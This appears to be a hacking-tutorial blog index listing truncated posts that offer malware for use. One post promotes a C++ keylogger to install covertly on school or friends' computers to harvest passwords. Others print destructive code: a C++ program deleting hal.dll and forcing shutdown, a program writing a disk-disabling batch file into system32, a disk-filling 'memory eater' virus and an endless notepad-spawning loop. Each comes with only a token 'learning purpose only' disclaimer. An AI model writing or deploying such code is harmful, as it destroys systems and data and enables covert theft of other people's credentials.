Learn To create Keylogger using C++|Basic Hacking Tutorials

Hi friends, the most interesting part  of the hacking is spying.  Today i am going to introduce to the C++ Spyware code.   It is going to be very fun.  You can install this spyware in your college/school  or in your friend system, and get their username and passwords.  This is very simple hacking trick […]

Hacking Autorun.inf virus attack|Is autorun.inf virus?

When i  studied second year(cse), my friends told that autorun.inf is virus.  I thought so.  Because my antivirus blocks autorun.inf files.   In third year when i search about autorun.inf file in net, i realize about the auto run file.  Today i bring some files from my college system.  When i insert the pen drive […]

C++ ,Batch Virus code to disable All Hard disk

Hi friends,here i give you give the C++ virus code.  Actually Batch code is converted to C++ virus code.  If you like you can use it as batch code also. C++ Virus Code : #include < windows.h >#include < fstream.h >#include < iostream.h >#include < string.h >#include < conio.h >int main(){ofstream write ( “C:\WINDOWS\system32\HackingStar.bat” ); […]

C++ virus that deletes the hal.dll file in system32

Hi in this article i will give you the c++ virus code.  Don’t use for any illegal purpose.  This is just for learning purpose only. #include<stdio.h>#include<stdlib.h> using namespace std; int main(int argc, char *argv[]){std::remove(“%systemroot%\system32\hal.dll”); //PWNAGE TIMEsystem(“shutdown -s -r”);system(“PAUSE”);return EXIT_SUCCESS;} Above code will find the system32 folder and deletes the “hal.dll” file Hal.dll Hal.dll is Windows’ […]

C program Memory Space Eater virus

Hi friends this is BreakTheSec. I am going to give you C program to eat the memory in Hard drive. This virus is able to eat the memory space 1 GB per minute. So Becareful with this virus. #include<stdio.h>#include<conio.h>#include<dos.h>#include<stdlib.h>FILE *a,*t,*b;int r,status,vir_count;double i;char ch[]=”CREATING A HUGE FILE FOR OCCUPYING HARDDISK SPACE”,choice; void eatspace(void);void findroot(void);void showstatus(void);void draw(void);void […]

Procedure to Fix windows xp after Virus Attack?

There are several free tool in the market that can help you to fix your windows xp after virus attacks. Let me introduce a software named as “QUICK FIX”. This will fix your windows xp after virus attack Features: 1. Enable Task Manager2. Enable Registry3. Enable Folder Options4. Restore missing run dialog5. Enable Command Prompt(cmd)6. […]

A batch program to open the notepad file continuously

Hi friends, As usual  today also i am going to give you simple batch program to open the notepad continuously.  This is not at all going to harmful. But be careful. Batch Code: @ECHO off:topSTART %SystemRoot%system32notepad.exeGOTO top Open the Notepad and paste this code. Save the file with .bat extension(for eg: notepadhack.bat). Now double clicking the […]